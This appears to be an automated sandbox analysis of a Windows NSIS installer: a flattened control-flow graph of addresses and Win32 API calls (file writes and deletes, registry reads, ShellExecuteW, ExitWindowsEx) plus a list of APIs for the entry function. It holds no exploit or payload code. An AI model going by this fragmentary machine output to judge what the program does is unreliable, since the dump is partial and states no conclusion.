3654 40678f 3655 405d59 4 API calls 3654->3655 3656 406795 3655->3656 3657 406038 5 API calls 3656->3657 3664 403a97 3656->3664 3663 4067a5 3657->3663 3658 4067dd lstrlenW 3659 4067e4 3658->3659 3658->3663 3660 406722 3 API calls 3659->3660 3662 4067ea GetFileAttributesW 3660->3662 3661 4062d5 2 API calls 3661->3663 3662->3664 3663->3658 3663->3661 3663->3664 3665 406751 2 API calls 3663->3665 3664->3483 3666 406009 lstrcpynW 3664->3666 3665->3658 3666->3519 3667->3486 3669 406110 3668->3669 3670 4060f3 3668->3670 3672 406187 3669->3672 3673 40612d 3669->3673 3676 406104 3669->3676 3671 4060fd CloseHandle 3670->3671 3670->3676 3671->3676 3674 406190 lstrcatW lstrlenW WriteFile 3672->3674 3672->3676 3673->3674 3675 406136 GetFileAttributesW 3673->3675 3674->3676 4024 405e50 GetFileAttributesW CreateFileW 3675->4024 3676->3483 3678 406152 3678->3676 3679 406162 WriteFile 3678->3679 3680 40617c SetFilePointer 3678->3680 3679->3680 3680->3672 3681->3509 3682->3514 3683->3529 3697 406812 3684->3697 3685 406a7f 3686 403b6c DeleteFileW 3685->3686 4027 406009 lstrcpynW 3685->4027 3686->3527 3686->3529 3688 4068d3 GetVersion 3700 4068e0 3688->3700 3689 406a46 lstrlenW 3689->3697 3690 406805 10 API calls 3690->3689 3693 405ed3 3 API calls 3693->3700 3694 406952 GetSystemDirectoryW 3694->3700 3695 406965 GetWindowsDirectoryW 3695->3700 3696 406038 5 API calls 3696->3697 3697->3685 3697->3688 3697->3689 3697->3690 3697->3696 4025 405f51 wsprintfW 3697->4025 4026 406009 lstrcpynW 3697->4026 3698 406805 10 API calls 3698->3700 3699 4069df lstrcatW 3699->3697 3700->3693 3700->3694 3700->3695 3700->3697 3700->3698 3700->3699 3701 406999 SHGetSpecialFolderLocation 3700->3701 3701->3700 3702 4069b1 SHGetPathFromIDListW CoTaskMemFree 3701->3702 3702->3700 3704 4062fc 3 API calls 3703->3704 3705 406c6f 3704->3705 3707 406c90 3705->3707 4028 406a99 lstrcpyW 3705->4028 3707->3529 3709 405c7a 3708->3709 3710 405c6e CloseHandle 3708->3710 3709->3529 3710->3709 3712 40139d 80 API calls 
3711->3712 3713 401432 3712->3713 3713->3495 3720 406045 3714->3720 3715 4060bb 3716 4060c1 CharPrevW 3715->3716 3718 4060e1 3715->3718 3716->3715 3717 4060ae CharNextW 3717->3715 3717->3720 3718->3549 3719 405d06 CharNextW 3719->3720 3720->3715 3720->3717 3720->3719 3721 40609a CharNextW 3720->3721 3722 4060a9 CharNextW 3720->3722 3721->3720 3722->3717 3724 4037ea CreateDirectoryW 3723->3724 3725 40673f lstrcatW 3723->3725 3726 405e7f 3724->3726 3725->3724 3727 405e8c GetTickCount GetTempFileNameW 3726->3727 3728 405ec2 3727->3728 3729 4037fe 3727->3729 3728->3727 3728->3729 3729->3475 3730->3556 3731->3558 3733 406760 3732->3733 3734 4035f3 3733->3734 3735 406766 CharPrevW 3733->3735 3736 406009 lstrcpynW 3734->3736 3735->3733 3735->3734 3736->3562 3738 403357 3737->3738 3738->3576 3740 4032f3 3739->3740 3741 4032db 3739->3741 3744 403303 GetTickCount 3740->3744 3745 4032fb 3740->3745 3742 4032e4 DestroyWindow 3741->3742 3743 4032eb 3741->3743 3742->3743 3743->3565 3747 403311 CreateDialogParamW ShowWindow 3744->3747 3748 403334 3744->3748 3774 406332 3745->3774 3747->3748 3748->3565 3750->3571 3753 403398 3751->3753 3752 4033c3 3755 403336 ReadFile 3752->3755 3753->3752 3785 403368 SetFilePointer 3753->3785 3756 4033ce 3755->3756 3757 4033e7 GetTickCount 3756->3757 3758 403518 3756->3758 3760 4033d2 3756->3760 3770 4033fa 3757->3770 3759 40351c 3758->3759 3764 403540 3758->3764 3761 403336 ReadFile 3759->3761 3760->3580 3761->3760 3762 403336 ReadFile 3762->3764 3763 403336 ReadFile 3763->3770 3764->3760 3764->3762 3765 40355f WriteFile 3764->3765 3765->3760 3766 403574 3765->3766 3766->3760 3766->3764 3768 40345c GetTickCount 3768->3770 3769 403485 MulDiv wsprintfW 3786 404f72 3769->3786 3770->3760 3770->3763 3770->3768 3770->3769 3772 4034c9 WriteFile 3770->3772 3778 407312 3770->3778 3772->3760 3772->3770 3773->3572 3775 40634f PeekMessageW 3774->3775 3776 406345 DispatchMessageW 3775->3776 3777 403301 3775->3777 3776->3775 3777->3565 3779 407332 3778->3779 
3780 40733a 3778->3780 3779->3770 3780->3779 3781 4073c2 GlobalFree 3780->3781 3782 4073cb GlobalAlloc 3780->3782 3783 407443 GlobalAlloc 3780->3783 3784 40743a GlobalFree 3780->3784 3781->3782 3782->3779 3782->3780 3783->3779 3783->3780 3784->3783 3785->3752 3787 404f8b 3786->3787 3796 40502f 3786->3796 3788 404fa9 lstrlenW 3787->3788 3789 406805 18 API calls 3787->3789 3790 404fd2 3788->3790 3791 404fb7 lstrlenW 3788->3791 3789->3788 3793 404fe5 3790->3793 3794 404fd8 SetWindowTextW 3790->3794 3792 404fc9 lstrcatW 3791->3792 3791->3796 3792->3790 3795 404feb SendMessageW SendMessageW SendMessageW 3793->3795 3793->3796 3794->3793 3795->3796 3796->3770 3798 403ea9 3797->3798 3826 405f51 wsprintfW 3798->3826 3800 403f1d 3801 406805 18 API calls 3800->3801 3802 403f29 SetWindowTextW 3801->3802 3804 403f44 3802->3804 3803 403f5f 3803->3595 3804->3803 3805 406805 18 API calls 3804->3805 3805->3804 3806->3592 3808 405f07 RegQueryValueExW 3807->3808 3809 405989 3807->3809 3810 405f29 RegCloseKey 3808->3810 3809->3590 3809->3591 3810->3809 3812->3597 3827 406009 lstrcpynW 3813->3827 3815 403e88 3816 406722 3 API calls 3815->3816 3817 403e8e lstrcatW 3816->3817 3817->3616 3828 403daf 3818->3828 3820 40506a 3823 4062a3 11 API calls 3820->3823 3825 405095 3820->3825 3831 40139d 3820->3831 3821 403daf SendMessageW 3822 4050a5 OleUninitialize 3821->3822 3822->3633 3823->3820 3825->3821 3826->3800 3827->3815 3829 403dc7 3828->3829 3830 403db8 SendMessageW 3828->3830 3829->3820 3830->3829 3834 4013a4 3831->3834 3832 401410 3832->3820 3834->3832 3835 4013dd MulDiv SendMessageW 3834->3835 3836 4015a0 3834->3836 3835->3834 3837 4015fa 3836->3837 3916 40160c 3836->3916 3838 401601 3837->3838 3839 401742 3837->3839 3840 401962 3837->3840 3841 4019ca 3837->3841 3842 40176e 3837->3842 3843 401650 3837->3843 3844 4017b1 3837->3844 3845 401672 3837->3845 3846 401693 3837->3846 3847 401616 3837->3847 3848 4016d6 3837->3848 3849 401736 3837->3849 3850 401897 3837->3850 3851 4018db 
3837->3851 3852 40163c 3837->3852 3853 4016bd 3837->3853 3837->3916 3866 4062a3 11 API calls 3838->3866 3858 401751 ShowWindow 3839->3858 3859 401758 3839->3859 3863 40145c 18 API calls 3840->3863 3856 40145c 18 API calls 3841->3856 3860 40145c 18 API calls 3842->3860 3943 4062a3 lstrlenW wvsprintfW 3843->3943 3949 40145c 3844->3949 3861 40145c 18 API calls 3845->3861 3946 401446 3846->3946 3855 40145c 18 API calls 3847->3855 3872 401446 18 API calls 3848->3872 3848->3916 3849->3916 3965 405f51 wsprintfW 3849->3965 3862 40145c 18 API calls 3850->3862 3867 40145c 18 API calls 3851->3867 3857 401647 PostQuitMessage 3852->3857 3852->3916 3854 4062a3 11 API calls 3853->3854 3869 4016c7 SetForegroundWindow 3854->3869 3870 40161c 3855->3870 3871 4019d1 SearchPathW 3856->3871 3857->3916 3858->3859 3873 401765 ShowWindow 3859->3873 3859->3916 3874 401775 3860->3874 3875 401678 3861->3875 3876 40189d 3862->3876 3877 401968 GetFullPathNameW 3863->3877 3866->3916 3868 4018e2 3867->3868 3880 40145c 18 API calls 3868->3880 3869->3916 3881 4062a3 11 API calls 3870->3881 3871->3916 3872->3916 3873->3916 3884 4062a3 11 API calls 3874->3884 3885 4062a3 11 API calls 3875->3885 3961 4062d5 FindFirstFileW 3876->3961 3887 40197f 3877->3887 3929 4019a1 3877->3929 3879 40169a 3889 4062a3 11 API calls 3879->3889 3890 4018eb 3880->3890 3891 401627 3881->3891 3893 401785 SetFileAttributesW 3884->3893 3894 401683 3885->3894 3911 4062d5 2 API calls 3887->3911 3887->3929 3888 4062a3 11 API calls 3896 4017c9 3888->3896 3897 4016a7 Sleep 3889->3897 3899 40145c 18 API calls 3890->3899 3900 404f72 25 API calls 3891->3900 3902 40179a 3893->3902 3893->3916 3909 404f72 25 API calls 3894->3909 3954 405d59 CharNextW CharNextW 3896->3954 3897->3916 3898 4019b8 GetShortPathNameW 3898->3916 3907 4018f5 3899->3907 3900->3916 3901 40139d 65 API calls 3901->3916 3908 4062a3 11 API calls 3902->3908 3903 4018c2 3912 4062a3 11 API calls 3903->3912 3904 4018a9 3910 4062a3 11 API calls 3904->3910 3914 4062a3 11 
API calls 3907->3914 3908->3916 3909->3916 3910->3916 3915 401991 3911->3915 3912->3916 3913 4017d4 3917 401864 3913->3917 3920 405d06 CharNextW 3913->3920 3938 4062a3 11 API calls 3913->3938 3918 401902 MoveFileW 3914->3918 3915->3929 3964 406009 lstrcpynW 3915->3964 3916->3834 3917->3894 3919 40186e 3917->3919 3921 401912 3918->3921 3922 40191e 3918->3922 3923 404f72 25 API calls 3919->3923 3925 4017e6 CreateDirectoryW 3920->3925 3921->3894 3927 401942 3922->3927 3932 4062d5 2 API calls 3922->3932 3928 401875 3923->3928 3925->3913 3926 4017fe GetLastError 3925->3926 3930 401827 GetFileAttributesW 3926->3930 3931 40180b GetLastError 3926->3931 3937 4062a3 11 API calls 3927->3937 3960 406009 lstrcpynW 3928->3960 3929->3898 3929->3916 3930->3913 3934 4062a3 11 API calls 3931->3934 3935 401929 3932->3935 3934->3913 3935->3927 3940 406c68 42 API calls 3935->3940 3936 401882 SetCurrentDirectoryW 3936->3916 3939 40195c 3937->3939 3938->3913 3939->3916 3941 401936 3940->3941 3942 404f72 25 API calls 3941->3942 3942->3927 3944 4060e7 9 API calls 3943->3944 3945 401664 3944->3945 3945->3901 3947 406805 18 API calls 3946->3947 3948 401455 3947->3948 3948->3879 3950 406805 18 API calls 3949->3950 3951 401488 3950->3951 3952 401497 3951->3952 3953 406038 5 API calls 3951->3953 3952->3888 3953->3952 3955 405d76 3954->3955 3956 405d88 3954->3956 3955->3956 3957 405d83 CharNextW 3955->3957 3958 405dac 3956->3958 3959 405d06 CharNextW 3956->3959 3957->3958 3958->3913 3959->3956 3960->3936 3962 4018a5 3961->3962 3963 4062eb FindClose 3961->3963 3962->3903 3962->3904 3963->3962 3964->3929 3965->3916 3967 403c91 3966->3967 3968 403876 3967->3968 3969 403c96 FreeLibrary GlobalFree 3967->3969 3970 406c9b 3968->3970 3969->3968 3969->3969 3971 40677e 18 API calls 3970->3971 3972 406cae 3971->3972 3973 406cb7 DeleteFileW 3972->3973 3974 406cce 3972->3974 4014 403882 OleUninitialize 3973->4014 3975 406e4b 3974->3975 4018 406009 lstrcpynW 3974->4018 3981 4062d5 2 API calls 3975->3981 4003 
406e58 3975->4003 3975->4014 3977 406cf9 3978 406d03 lstrcatW 3977->3978 3979 406d0d 3977->3979 3980 406d13 3978->3980 3982 406751 2 API calls 3979->3982 3984 406d23 lstrcatW 3980->3984 3985 406d19 3980->3985 3983 406e64 3981->3983 3982->3980 3988 406722 3 API calls 3983->3988 3983->4014 3987 406d2b lstrlenW FindFirstFileW 3984->3987 3985->3984 3985->3987 3986 4062a3 11 API calls 3986->4014 3989 406e3b 3987->3989 3993 406d52 3987->3993 3990 406e6e 3988->3990 3989->3975 3992 4062a3 11 API calls 3990->3992 3991 405d06 CharNextW 3991->3993 3994 406e79 3992->3994 3993->3991 3997 406e18 FindNextFileW 3993->3997 4006 406c9b 72 API calls 3993->4006 4013 404f72 25 API calls 3993->4013 4015 4062a3 11 API calls 3993->4015 4016 404f72 25 API calls 3993->4016 4017 406c68 42 API calls 3993->4017 4019 406009 lstrcpynW 3993->4019 4020 405e30 GetFileAttributesW 3993->4020 3995 405e30 2 API calls 3994->3995 3996 406e81 RemoveDirectoryW 3995->3996 4000 406ec4 3996->4000 4001 406e8d 3996->4001 3997->3993 3999 406e30 FindClose 3997->3999 3999->3989 4002 404f72 25 API calls 4000->4002 4001->4003 4004 406e93 4001->4004 4002->4014 4003->3986 4005 4062a3 11 API calls 4004->4005 4007 406e9d 4005->4007 4006->3993 4009 404f72 25 API calls 4007->4009 4011 406ea7 4009->4011 4012 406c68 42 API calls 4011->4012 4012->4014 4013->3997 4014->3491 4014->3492 4015->3993 4016->3993 4017->3993 4018->3977 4019->3993 4021 405e4d DeleteFileW 4020->4021 4022 405e3f SetFileAttributesW 4020->4022 4021->3993 4022->4021 4023->3654 4024->3678 4025->3697 4026->3697 4027->3686 4029 406ae7 GetShortPathNameW 4028->4029 4030 406abe 4028->4030 4031 406b00 4029->4031 4032 406c62 4029->4032 4054 405e50 GetFileAttributesW CreateFileW 4030->4054 4031->4032 4034 406b08 WideCharToMultiByte 4031->4034 4032->3707 4034->4032 4036 406b25 WideCharToMultiByte 4034->4036 4035 406ac7 CloseHandle GetShortPathNameW 4035->4032 4037 406adf 4035->4037 4036->4032 4038 406b3d wsprintfA 4036->4038 4037->4029 4037->4032 4039 406805 18 API 
calls 4038->4039 4040 406b69 4039->4040 4055 405e50 GetFileAttributesW CreateFileW 4040->4055 4042 406b76 4042->4032 4043 406b83 GetFileSize GlobalAlloc 4042->4043 4044 406ba4 ReadFile 4043->4044 4045 406c58 CloseHandle 4043->4045 4044->4045 4046 406bbe 4044->4046 4045->4032 4046->4045 4056 405db6 lstrlenA 4046->4056 4049 406bd7 lstrcpyA 4052 406bf9 4049->4052 4050 406beb 4051 405db6 4 API calls 4050->4051 4051->4052 4053 406c30 SetFilePointer WriteFile GlobalFree 4052->4053 4053->4045 4054->4035 4055->4042 4057 405df7 lstrlenA 4056->4057 4058 405dd0 lstrcmpiA 4057->4058 4059 405dff 4057->4059 4058->4059 4060 405dee CharNextA 4058->4060 4059->4049 4059->4050 4060->4057 4938 402a84 4939 401553 19 API calls 4938->4939 4940 402a8e 4939->4940 4941 401446 18 API calls 4940->4941 4942 402a98 4941->4942 4943 401a13 4942->4943 4944 402ab2 RegEnumKeyW 4942->4944 4945 402abe RegEnumValueW 4942->4945 4946 402a7e 4944->4946 4945->4943 4945->4946 4946->4943 4947 4029e4 RegCloseKey 4946->4947 4947->4943 4948 402c8a 4949 402ca2 4948->4949 4950 402c8f 4948->4950 4952 40145c 18 API calls 4949->4952 4951 401446 18 API calls 4950->4951 4954 402c97 4951->4954 4953 402ca9 lstrlenW 4952->4953 4953->4954 4955 402ccb WriteFile 4954->4955 4956 401a13 4954->4956 4955->4956 4957 40400d 4958 40406a 4957->4958 4959 40401a lstrcpynA lstrlenA 4957->4959 4959->4958 4960 40404b 4959->4960 4960->4958 4961 404057 GlobalFree 4960->4961 4961->4958 4962 401d8e 4963 40145c 18 API calls 4962->4963 4964 401d95 ExpandEnvironmentStringsW 4963->4964 4965 401da8 4964->4965 4967 401db9 4964->4967 4966 401dad lstrcmpW 4965->4966 4965->4967 4966->4967 4968 401e0f 4969 401446 18 API calls 4968->4969 4970 401e17 4969->4970 4971 401446 18 API calls 4970->4971 4972 401e21 4971->4972 4973 4030e3 4972->4973 4975 405f51 wsprintfW 4972->4975 4975->4973 4976 402392 4977 40145c 18 API calls 4976->4977 4978 402399 4977->4978 4981 4071f8 4978->4981 4982 406ed2 25 API calls 4981->4982 4983 407218 4982->4983 4984 407222 
lstrcpynW lstrcmpW 4983->4984 4985 4023a7 4983->4985 4986 407254 4984->4986 4987 40725a lstrcpynW 4984->4987 4986->4987 4987->4985 4061 402713 4076 406009 lstrcpynW 4061->4076 4063 40272c 4077 406009 lstrcpynW 4063->4077 4065 402738 4066 40145c 18 API calls 4065->4066 4068 402743 4065->4068 4066->4068 4067 402752 4070 40145c 18 API calls 4067->4070 4072 402761 4067->4072 4068->4067 4069 40145c 18 API calls 4068->4069 4069->4067 4070->4072 4071 40145c 18 API calls 4073 40276b 4071->4073 4072->4071 4074 4062a3 11 API calls 4073->4074 4075 40277f WritePrivateProfileStringW 4074->4075 4076->4063 4077->4065 4988 402797 4989 40145c 18 API calls 4988->4989 4990 4027ae 4989->4990 4991 40145c 18 API calls 4990->4991 4992 4027b7 4991->4992 4993 40145c 18 API calls 4992->4993 4994 4027c0 GetPrivateProfileStringW lstrcmpW 4993->4994 4995 402e18 4996 40145c 18 API calls 4995->4996 4997 402e1f FindFirstFileW 4996->4997 4998 402e32 4997->4998 5003 405f51 wsprintfW 4998->5003 5000 402e43 5004 406009 lstrcpynW 5000->5004 5002 402e50 5003->5000 5004->5002 5005 401e9a 5006 40145c 18 API calls 5005->5006 5007 401ea1 5006->5007 5008 401446 18 API calls 5007->5008 5009 401eab wsprintfW 5008->5009 4127 401a1f 4128 40145c 18 API calls 4127->4128 4129 401a26 4128->4129 4130 4062a3 11 API calls 4129->4130 4131 401a49 4130->4131 4132 401a64 4131->4132 4133 401a5c 4131->4133 4181 406009 lstrcpynW 4132->4181 4180 406009 lstrcpynW 4133->4180 4136 401a62 4140 406038 5 API calls 4136->4140 4137 401a6f 4138 406722 3 API calls 4137->4138 4139 401a75 lstrcatW 4138->4139 4139->4136 4142 401a81 4140->4142 4141 4062d5 2 API calls 4141->4142 4142->4141 4143 405e30 2 API calls 4142->4143 4145 401a98 CompareFileTime 4142->4145 4146 401ba9 4142->4146 4150 4062a3 11 API calls 4142->4150 4154 406009 lstrcpynW 4142->4154 4160 406805 18 API calls 4142->4160 4167 405ca0 MessageBoxIndirectW 4142->4167 4171 401b50 4142->4171 4178 401b5d 4142->4178 4179 405e50 GetFileAttributesW CreateFileW 4142->4179 4143->4142 
4145->4142 4147 404f72 25 API calls 4146->4147 4149 401bb3 4147->4149 4148 404f72 25 API calls 4151 401b70 4148->4151 4152 40337f 37 API calls 4149->4152 4150->4142 4155 4062a3 11 API calls 4151->4155 4153 401bc6 4152->4153 4156 4062a3 11 API calls 4153->4156 4154->4142 4162 401b8b 4155->4162 4157 401bda 4156->4157 4158 401be9 SetFileTime 4157->4158 4159 401bf8 FindCloseChangeNotification 4157->4159 4158->4159 4161 401c09 4159->4161 4159->4162 4160->4142 4163 401c21 4161->4163 4164 401c0e 4161->4164 4166 406805 18 API calls 4163->4166 4165 406805 18 API calls 4164->4165 4168 401c16 lstrcatW 4165->4168 4169 401c29 4166->4169 4167->4142 4168->4169 4170 4062a3 11 API calls 4169->4170 4172 401c34 4170->4172 4173 401b93 4171->4173 4174 401b53 4171->4174 4175 405ca0 MessageBoxIndirectW 4172->4175 4176 4062a3 11 API calls 4173->4176 4177 4062a3 11 API calls 4174->4177 4175->4162 4176->4162 4177->4178 4178->4148 4179->4142 4180->4136 4181->4137 5010 40209f GetDlgItem GetClientRect 5011 40145c 18 API calls 5010->5011 5012 4020cf LoadImageW SendMessageW 5011->5012 5013 4030e3 5012->5013 5014 4020ed DeleteObject 5012->5014 5014->5013 5015 402b9f 5016 401446 18 API calls 5015->5016 5021 402ba7 5016->5021 5017 402c4a 5018 402bdf ReadFile 5020 402c3d 5018->5020 5018->5021 5019 401446 18 API calls 5019->5020 5020->5017 5020->5019 5027 402d17 ReadFile 5020->5027 5021->5017 5021->5018 5021->5020 5022 402c06 MultiByteToWideChar 5021->5022 5023 402c3f 5021->5023 5025 402c4f 5021->5025 5022->5021 5022->5025 5028 405f51 wsprintfW 5023->5028 5025->5020 5026 402c6b SetFilePointer 5025->5026 5026->5020 5027->5020 5028->5017 5029 402b23 GlobalAlloc 5030 402b39 5029->5030 5031 402b4b 5029->5031 5032 401446 18 API calls 5030->5032 5033 40145c 18 API calls 5031->5033 5034 402b41 5032->5034 5035 402b52 WideCharToMultiByte lstrlenA 5033->5035 5036 402b93 5034->5036 5037 402b84 WriteFile 5034->5037 5035->5034 5037->5036 5038 402384 GlobalFree 5037->5038 5038->5036 5040 4044a5 5041 404512 
5040->5041 5042 4044df 5040->5042 5044 40451f GetDlgItem GetAsyncKeyState 5041->5044 5051 4045b1 5041->5051 5108 405c84 GetDlgItemTextW 5042->5108 5047 40453e GetDlgItem 5044->5047 5054 40455c 5044->5054 5045 4044ea 5048 406038 5 API calls 5045->5048 5046 40469d 5106 404833 5046->5106 5110 405c84 GetDlgItemTextW 5046->5110 5049 403d3f 19 API calls 5047->5049 5050 4044f0 5048->5050 5053 404551 ShowWindow 5049->5053 5056 403e74 5 API calls 5050->5056 5051->5046 5057 406805 18 API calls 5051->5057 5051->5106 5053->5054 5059 404579 SetWindowTextW 5054->5059 5064 405d59 4 API calls 5054->5064 5055 403dca 8 API calls 5060 404847 5055->5060 5061 4044f5 GetDlgItem 5056->5061 5062 40462f SHBrowseForFolderW 5057->5062 5058 4046c9 5063 40677e 18 API calls 5058->5063 5065 403d3f 19 API calls 5059->5065 5066 404503 IsDlgButtonChecked 5061->5066 5061->5106 5062->5046 5067 404647 CoTaskMemFree 5062->5067 5068 4046cf 5063->5068 5069 40456f 5064->5069 5070 404597 5065->5070 5066->5041 5071 406722 3 API calls 5067->5071 5111 406009 lstrcpynW 5068->5111 5069->5059 5075 406722 3 API calls 5069->5075 5072 403d3f 19 API calls 5070->5072 5073 404654 5071->5073 5076 4045a2 5072->5076 5077 40468b SetDlgItemTextW 5073->5077 5082 406805 18 API calls 5073->5082 5075->5059 5109 403d98 SendMessageW 5076->5109 5077->5046 5078 4046e6 5080 4062fc 3 API calls 5078->5080 5089 4046ee 5080->5089 5081 4045aa 5085 4062fc 3 API calls 5081->5085 5083 404673 lstrcmpiW 5082->5083 5083->5077 5086 404684 lstrcatW 5083->5086 5084 404730 5112 406009 lstrcpynW 5084->5112 5085->5051 5086->5077 5088 404739 5090 405d59 4 API calls 5088->5090 5089->5084 5094 406751 2 API calls 5089->5094 5095 404785 5089->5095 5091 40473f GetDiskFreeSpaceW 5090->5091 5093 404763 MulDiv 5091->5093 5091->5095 5093->5095 5094->5089 5097 4047e2 5095->5097 5098 4043ad 21 API calls 5095->5098 5096 404805 5113 403d85 EnableWindow 5096->5113 5097->5096 5099 40141d 80 API calls 5097->5099 5100 4047d3 5098->5100 5099->5096 5102 4047e4 
SetDlgItemTextW 5100->5102 5103 4047d8 5100->5103 5102->5097 5104 4043ad 21 API calls 5103->5104 5104->5097 5105 404821 5105->5106 5114 403d61 5105->5114 5106->5055 5108->5045 5109->5081 5110->5058 5111->5078 5112->5088 5113->5105 5115 403d74 SendMessageW 5114->5115 5116 403d6f 5114->5116 5115->5106 5116->5115 5117 402da5 5118 4030e3 5117->5118 5119 402dac 5117->5119 5120 401446 18 API calls 5119->5120 5121 402db8 5120->5121 5122 402dbf SetFilePointer 5121->5122 5122->5118 5123 402dcf 5122->5123 5123->5118 5125 405f51 wsprintfW 5123->5125 5125->5118 5126 4030a9 SendMessageW 5127 4030c2 InvalidateRect 5126->5127 5128 4030e3 5126->5128 5127->5128 5129 401cb2 5130 40145c 18 API calls 5129->5130 5131 401c54 5130->5131 5132 4062a3 11 API calls 5131->5132 5135 401c64 5131->5135 5133 401c59 5132->5133 5134 406c9b 81 API calls 5133->5134 5134->5135 4078 4021b5 4079 40145c 18 API calls 4078->4079 4080 4021bb 4079->4080 4081 40145c 18 API calls 4080->4081 4082 4021c4 4081->4082 4083 40145c 18 API calls 4082->4083 4084 4021cd 4083->4084 4085 40145c 18 API calls 4084->4085 4086 4021d6 4085->4086 4087 404f72 25 API calls 4086->4087 4088 4021e2 ShellExecuteW 4087->4088 4089 40221b 4088->4089 4090 40220d 4088->4090 4092 4062a3 11 API calls 4089->4092 4091 4062a3 11 API calls 4090->4091 4091->4089 4093 402230 4092->4093 5143 402238 5144 40145c 18 API calls 5143->5144 5145 40223e 5144->5145 5146 4062a3 11 API calls 5145->5146 5147 40224b 5146->5147 5148 404f72 25 API calls 5147->5148 5149 402255 5148->5149 5150 405c3f 2 API calls 5149->5150 5151 40225b 5150->5151 5152 4062a3 11 API calls 5151->5152 5155 4022ac CloseHandle 5151->5155 5158 40226d 5152->5158 5154 4030e3 5155->5154 5156 402283 WaitForSingleObject 5157 402291 GetExitCodeProcess 5156->5157 5156->5158 5157->5155 5160 4022a3 5157->5160 5158->5155 5158->5156 5159 406332 2 API calls 5158->5159 5159->5156 5162 405f51 wsprintfW 5160->5162 5162->5155 5163 4040b8 5164 4040d3 5163->5164 5172 404201 5163->5172 5168 40410e 
5164->5168 5194 403fca WideCharToMultiByte 5164->5194 5165 40426c 5166 404276 GetDlgItem 5165->5166 5167 40433e 5165->5167 5169 404290 5166->5169 5170 4042ff 5166->5170 5173 403dca 8 API calls 5167->5173 5175 403d3f 19 API calls 5168->5175 5169->5170 5178 4042b6 6 API calls 5169->5178 5170->5167 5179 404311 5170->5179 5172->5165 5172->5167 5174 40423b GetDlgItem SendMessageW 5172->5174 5177 404339 5173->5177 5199 403d85 EnableWindow 5174->5199 5176 40414e 5175->5176 5181 403d3f 19 API calls 5176->5181 5178->5170 5182 404327 5179->5182 5183 404317 SendMessageW 5179->5183 5186 40415b CheckDlgButton 5181->5186 5182->5177 5187 40432d SendMessageW 5182->5187 5183->5182 5184 404267 5185 403d61 SendMessageW 5184->5185 5185->5165 5197 403d85 EnableWindow 5186->5197 5187->5177 5189 404179 GetDlgItem 5198 403d98 SendMessageW 5189->5198 5191 40418f SendMessageW 5192 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5191->5192 5193 4041ac GetSysColor 5191->5193 5192->5177 5193->5192 5195 404007 5194->5195 5196 403fe9 GlobalAlloc WideCharToMultiByte 5194->5196 5195->5168 5196->5195 5197->5189 5198->5191 5199->5184 4094 401eb9 4095 401f24 4094->4095 4096 401ec6 4094->4096 4097 401f53 GlobalAlloc 4095->4097 4098 401f28 4095->4098 4099 401ed5 4096->4099 4106 401ef7 4096->4106 4100 406805 18 API calls 4097->4100 4105 4062a3 11 API calls 4098->4105 4110 401f36 4098->4110 4101 4062a3 11 API calls 4099->4101 4104 401f46 4100->4104 4102 401ee2 4101->4102 4107 402708 4102->4107 4112 406805 18 API calls 4102->4112 4104->4107 4108 402387 GlobalFree 4104->4108 4105->4110 4116 406009 lstrcpynW 4106->4116 4108->4107 4118 406009 lstrcpynW 4110->4118 4111 401f06 4117 406009 lstrcpynW 4111->4117 4112->4102 4114 401f15 4119 406009 lstrcpynW 4114->4119 4116->4111 4117->4114 4118->4104 4119->4107 5200 4074bb 5202 407344 5200->5202 5201 407c6d 5202->5201 5203 4073c2 GlobalFree 5202->5203 5204 4073cb GlobalAlloc 5202->5204 5205 407443 GlobalAlloc 5202->5205 5206 40743a GlobalFree 
5202->5206 5203->5204 5204->5201 5204->5202 5205->5201 5205->5202 5206->5205

                                                                                  Control-flow Graph (image not preserved; legend: Executed / Not Executed; starts at block 403883-403919)
                                                                                  APIs
                                                                                  • #17.COMCTL32 ref: 004038A2
                                                                                  • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                                                  • OleInitialize.OLE32(00000000), ref: 004038B4
                                                                                    • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                    • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                    • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                  • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                                                    • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                  • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                                                  • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                                                  • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                                                  • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                                                  • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                                                  • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                                                  • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                                                  • OleUninitialize.OLE32(?), ref: 00403AD1
                                                                                  • ExitProcess.KERNEL32 ref: 00403AF1
                                                                                  • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                                                  • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                                                  • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                                                  • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                                                  • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                                                  • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                                                  • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                                                  • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                                                  • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmp
